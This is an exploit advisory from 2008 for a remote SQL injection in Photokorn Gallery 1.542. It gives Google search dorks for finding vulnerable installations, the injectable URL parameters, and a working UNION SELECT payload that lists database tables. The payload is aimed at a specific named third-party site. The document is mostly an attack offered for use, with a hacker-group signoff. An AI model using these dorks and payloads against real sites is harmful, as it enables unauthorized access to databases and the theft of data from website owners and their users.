Photokorn Gallery version 1.542 suffers from a SQL injection vulnerability.
c485dbe57eea3aededb37a6baf108963-+===#===#===#===#===#===#===#===#===#===#===#===+-
-+===# Photokorn 1.542 Remote Sql Injection #===+-
-+===#===#===#===#===#===#===#===#===#===#===#===+-
[x] Author | t@nzo0n
[x] Site | codebomb.org
[x] Date | 18 June 2008
[x] Version | 1.542
[+] D0rk 1 | Powered by photokorn + inurl:index.php?action=
[+] D0rk 2 | intext:photokorn 1.542 + inurl:cat=
[+] D0rk 3 | intext:photokorn 1.542 + inurl:pic=
[+] 3xpl0it | www.site.com/[path]/index.php?action=showpic&cat=22&pic=[SQL]
| www.site.com/[path]/index.php?action=showpic&cat=[SQL]
| www.site.com/[path]/index.php?action=[SQL]
p0c : http://www.travel-lightart.com/photogallery/index.php?action=showpic&cat=22&pic=null+union+all+select%201,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%20from%20information_schema.tables--
[x] Greetz | All code bombers :P
Comments
No comments yet, be the first!